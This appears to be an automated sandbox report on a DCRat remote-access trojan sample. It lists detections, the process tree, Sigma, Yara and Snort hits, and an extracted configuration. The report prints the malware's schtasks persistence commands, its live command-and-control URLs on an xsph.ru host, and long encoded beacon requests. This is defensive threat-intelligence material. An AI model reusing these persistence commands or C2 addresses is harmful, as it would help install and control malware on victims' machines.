Edit tour

Windows Analysis Report
N0tepkRPzw.exe

Overview

General Information

Sample name:	N0tepkRPzw.exe renamed because original name is a hash value
Original sample name:	4b173aaa031de977353ca903f23520e4.exe
Analysis ID:	1447088
MD5:	4b173aaa031de977353ca903f23520e4
SHA1:	56261520faf4c58a72be2edcff1c65a011896e16
SHA256:	da46d37c422bf241bd3dabbc8846d9f94e3d2b7f3e80e17d70bcc6eb13161630
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Snort IDS alert for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

N0tepkRPzw.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\N0tepkRPzw.exe" MD5: 4B173AAA031DE977353CA903F23520E4)

wscript.exe (PID: 7296 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7388 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

blockServerruntime.exe (PID: 7436 cmdline: "C:\bridgeportserver\blockServerruntime.exe" MD5: A6A0FB77338508B4185FE94263AA2D0F)

schtasks.exe (PID: 7516 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 5 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7548 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7564 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7580 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7596 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7636 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 10 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7656 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7672 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7688 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7716 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7736 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7752 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7768 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7784 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7804 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7824 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7888 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7944 cmdline: schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

qVUjshNEHYUOCXyHyUMQwFlZoe.exe (PID: 7992 cmdline: "C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe" MD5: A6A0FB77338508B4185FE94263AA2D0F)

qVUjshNEHYUOCXyHyUMQwFlZoe.exe (PID: 7604 cmdline: "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe" MD5: A6A0FB77338508B4185FE94263AA2D0F)

qVUjshNEHYUOCXyHyUMQwFlZoe.exe (PID: 7628 cmdline: "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe" MD5: A6A0FB77338508B4185FE94263AA2D0F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"E\":\"~\",\"J\":\"@\",\"h\":\"%\",\"j\":\"#\",\"1\":\"(\",\"l\":\"&\",\"S\":\"$\",\"3\":\"!\",\"M\":\"<\",\"8\":\";\",\"o\":\"-\",\"c\":\")\",\"Z\":\"`\",\"4\":\"_\",\"y\":\"^\",\"5\":\"*\",\"d\":\">\",\"6\":\"|\",\"B\":\".\",\"H\":\",\",\"p\":\" \"}", "PCRT": "{\"B\":\" \",\"V\":\"|\",\"F\":\")\",\"Q\":\"<\",\"l\":\"`\",\"M\":\"!\",\"W\":\">\",\"k\":\";\",\"c\":\"-\",\"w\":\"@\",\"S\":\"%\",\"U\":\"^\",\"d\":\"_\",\"m\":\"$\",\"D\":\"*\",\"X\":\"&\",\"R\":\".\",\"v\":\"#\",\"j\":\"(\",\"N\":\"~\",\"K\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-84cmi9yxIS6Lop3CzZmk", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "H2": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "T": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000002.1828726317.0000000002811000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1737024457.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: blockServerruntime.exe PID: 7436	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7604	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7628	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7992	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7992	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\bridgeportserver\blockServerruntime.exe, ProcessId: 7436, TargetFilename: C:\Windows\addins\RuntimeBroker.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\N0tepkRPzw.exe", ParentImage: C:\Users\user\Desktop\N0tepkRPzw.exe, ParentProcessId: 7252, ParentProcessName: N0tepkRPzw.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" , ProcessId: 7296, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\bridgeportserver\blockServerruntime.exe", ParentImage: C:\bridgeportserver\blockServerruntime.exe, ParentProcessId: 7436, ParentProcessName: blockServerruntime.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f, ProcessId: 7752, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN DCRat Initial Checkin Server Response M4 - Source IP: 141.8.192.26 - Destination IP: 192.168.2.4

Timestamp:	05/24/24-11:07:09.472406
SID:	2850862
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN DCRat Initial Checkin Server Response M4 - Source IP: 141.8.192.26 - Destination IP: 192.168.2.4

Timestamp:	05/24/24-11:08:12.793523
SID:	2850862
Source Port:	80
Destination Port:	49749
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: N0tepkRPzw.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://a0985701.xsph.ru/	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru/@=AzYyIGNycDO	Avira URL Cloud: Label: malware
Source: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5U